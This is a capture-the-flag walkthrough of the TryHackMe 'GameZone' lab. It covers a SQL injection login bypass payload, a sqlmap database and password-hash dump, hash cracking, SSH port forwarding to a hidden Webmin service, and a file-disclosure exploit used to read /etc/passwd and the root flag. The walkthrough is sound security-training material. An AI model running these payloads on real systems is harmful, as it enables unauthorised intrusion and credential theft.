GameZone

Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!

Linux SQLi Hashes Metasploit JohnTheRipper

Room Description

Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root! Find THM room here

Used Commands

sqlmap -r <path to request.txt> --dbms=mysql --dump
ssh <username>@<target ip>
ss -tulpn
ssh -L <bind_port>:<host>:<hostport> <username>@<target ip>

Task 1

Google: Who’s the guy?

This guy is known from a videogame called Hitman. I’m pretty sure you can find his name on your own.

Task 2

Obtain access via SQL Injection

The task description gives you a good idea of SQL injection and how it can be used, or rather abused, to query data the application never meant to return (sensitive data exposure).

The goal is to alter the SQL statement that is intended to validate e.g. login credentials, so that the statement returns other valid data instead.

Answer the next question by using ' or 1=1 -- - as the username. Leave the password field empty.
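As an added illustration (my code, not the write-up's or the room's), the login pattern Task 2 abuses, in Python with an in-memory SQLite table standing in for db.users: the concatenated query lets ' or 1=1 -- - rewrite the WHERE clause, while the parameterised version treats it as a plain username. The table contents are constructed and demo_user is a placeholder name.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the room's db.users table (username / pwd
    # columns as in the sqlmap dump); the values are made up.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    con.execute("INSERT INTO users VALUES ('demo_user', 'not-a-real-hash')")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    # The statement is built by string concatenation, so a quote in the
    # input ends the literal and the rest is parsed as SQL. With the
    # Task 2 payload the statement becomes
    #   ... WHERE username = '' or 1=1 -- -' AND pwd = ''
    # and everything after -- is a comment, so every row matches.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND pwd = '{password}'")
    return [row[0] for row in con.execute(sql)]


def login_safe(con, username, password):
    # Parameterised query: the values travel separately from the SQL text,
    # so the payload is compared as a literal username and matches nothing.
    sql = "SELECT username FROM users WHERE username = ? AND pwd = ?"
    return [row[0] for row in con.execute(sql, (username, password))]


def demo():
    con = make_db()
    payload = "' or 1=1 -- -"   # username from Task 2, password left empty
    return {
        "vulnerable": login_vulnerable(con, payload, ""),
        "safe": login_safe(con, payload, ""),
    }


if __name__ == "__main__":
    print(demo())
```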

Task 3

Using SQLMap

Use BurpSuite to intercept a request when you search for any game review. Use this request as input for a tool called sqlmap. If you are not familiar with BurpSuite, check out the beginner path on THM. There is a room on THM, BurpSuite, created by DarkStar7471, that gives you a basic understanding and overview of how to use Burp.

Check your settings in Burp. Intercept should be switched on.

Change highlighted settings on Burp

Click the search button in your browser and come back to Burp. You should find something similar to the following screenshot:

HTTP Request on portal.php

Copy the content of the request and save it to a file e.g. request.txt.

Then run sqlmap -r <path to request.txt> --dbms=mysql --dump

When I ran sqlmap I had to confirm with y multiple times. sqlmap shows a short description in each case, but I’d recommend reading along and following the execution, as you can find some useful information there.

If everything went right, you should now receive the hashed password.

[21:57:48] [INFO] writing hashes to a temporary file '/tmp/sqlmapgpDenn4863/sqlmaphashes-AWGpER.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[21:57:55] [INFO] using hash method 'sha256_generic_passwd'
[21:57:55] [WARNING] no clear password(s) found
Database: db
Table: users
[1 entry]

+------------------------------------------------------------------+-----------+
| pwd                                                              | username  |
+------------------------------------------------------------------+-----------+
| ab5db915fc9cea6c78df88106c6nope57f2b52901ca6c0c6218f04xxxxxxxxxx |<username> |
+------------------------------------------------------------------+-----------+

[21:57:55] [INFO] table 'db.users' dumped to CSV file '/root/.sqlmap/output/10.10.103.176/dump/db/users.csv'
[21:57:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.103.176'

Scroll up and have a look at the output of sqlmap. You should find the other table and its name.

Task 4

What’s the password?

I did not use JohnTheRipper in this case. Instead I tried one of the many online tools available on the internet, e.g. hashes.com.

Result of hash lookup

If you are not yet familiar with john you should check out this room on THM John The Ripper created by PoloMints.

Now use the username and password and try to connect via ssh.

ssh <username>@10.10.103.176
<username>@gamezone:~$ dir
user.txt
<username>@gamezone:~$ cat user.txt

Task 5

Exposing services with reverse SSH tunnel

That topic is new to me so it took some time to get an overview and understand the basic concept behind the steps.

The following steps will guide you through this task.

  • Connect via ssh <username>@<target ip> to the target
  • run ss -tulpn and check the output
<username>@gamezone:~$ ss -tulpn
Netid State      Recv-Q Send-Q    Local Address:Port      Peer Address:Port
udp   UNCONN     0      0                     *:10000                *:*
udp   UNCONN     0      0                     *:68                   *:*
tcp   LISTEN     0      80            127.0.0.1:3306                 *:*
----------------------------------------------------------------------------
|------                    Check this line                          -------|
----------------------------------------------------------------------------
| tcp   LISTEN     0      128                   *:10000                *:* |
----------------------------------------------------------------------------
tcp   LISTEN     0      128                   *:22                   *:*
tcp   LISTEN     0      128                  :::80                  :::*
tcp   LISTEN     0      128                  :::22                  :::*
  • run ssh -L 9000:localhost:10000 <username>@<target ip>

Argument   Description
9000       the port you will enter in your browser (next step)
localhost  this is 127.0.0.1 from the output above; it is resolved on the target, i.e. the target's own loopback interface
10000      the port from the output above

If you do not understand what’s going on, I recommend having a look at the SSH manual (man ssh, option -L):

ssh -L <bind_port>:<host>:<hostport> <username>@<target ip>

root@ip-10-10-136-248:~# ssh -L 9000:localhost:10000 <username>@10.10.19.166
<username>@10.10.19.166's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.


Last login: Wed Apr 21 04:46:05 2021 from 10.10.136.248
<username>@gamezone:~$

Open your browser and enter localhost:9000

The welcome screen will answer the question asking for the name of the CMS. Carefully read the first page where you also find the version.
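An added check (my code, not the write-up's) that reads the ss -tulpn output from the step above and lists the listeners you could not reach directly, which is how port 10000 ends up in the ssh -L command. It assumes an external scan showed only 22 and 80 open; that set is constructed for the example, the page does not show a scan.

```python
# Constructed sample in the shape of the ss -tulpn output shown above
# (the decorative box the write-up draws around port 10000 is left out).
SS_OUTPUT = """\
Netid State      Recv-Q Send-Q    Local Address:Port      Peer Address:Port
udp   UNCONN     0      0                     *:10000                *:*
udp   UNCONN     0      0                     *:68                   *:*
tcp   LISTEN     0      80            127.0.0.1:3306                 *:*
tcp   LISTEN     0      128                   *:10000                *:*
tcp   LISTEN     0      128                   *:22                   *:*
tcp   LISTEN     0      128                  :::80                  :::*
tcp   LISTEN     0      128                  :::22                  :::*
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_ss(text):
    """Return (address, port) for every listening TCP socket in ss output."""
    found = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "tcp" or cols[1] != "LISTEN":
            continue
        # rpartition splits on the last colon, so 127.0.0.1:3306 and :::80 both work
        addr, _, port = cols[4].rpartition(":")
        found.append((addr, int(port)))
    return found


def tunnel_candidates(text, reachable_ports):
    """Ports listening on the target that you could not reach directly.

    reachable_ports: the ports an external scan already showed open.
    Loopback-only listeners are never reachable from outside; any other
    listener missing from the scan is most likely filtered on the way in."""
    out = set()
    for addr, port in parse_ss(text):
        if addr in LOOPBACK or port not in reachable_ports:
            out.add(port)
    return sorted(out)


def forward_command(local_port, remote_port, user, target):
    """Build the local forward used in Task 5: local_port on your machine is
    sent over SSH to remote_port on the target's own loopback."""
    return f"ssh -L {local_port}:localhost:{remote_port} {user}@{target}"
```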

Task 6

Find the exploit

Now let’s search for an exploit that we can use to gain root and read the flag. There are several write-ups that show how to use that exploit manually (as I did), since this is the direct way to the root flag.

Direct way to root.txt (w/o Metasploit)

Download and study the exploit. Find the following line of code somewhere close to the end of the file:

code snippet that shows some interesting part in the exploit

What do you see when you enter localhost:9000/file/show.cgi/bin in your browser?

Picture of download form

Hmmm… not what we expected. Let’s try something different.

What happens when you try sending a different payload, e.g. etc/passwd?

localhost:9000/file/show.cgi/etc/passwd
Picture of /etc/passwd file

Uhhh that looks interesting!

Have a look at the hint and you know the location of the root flag. Can you read its content?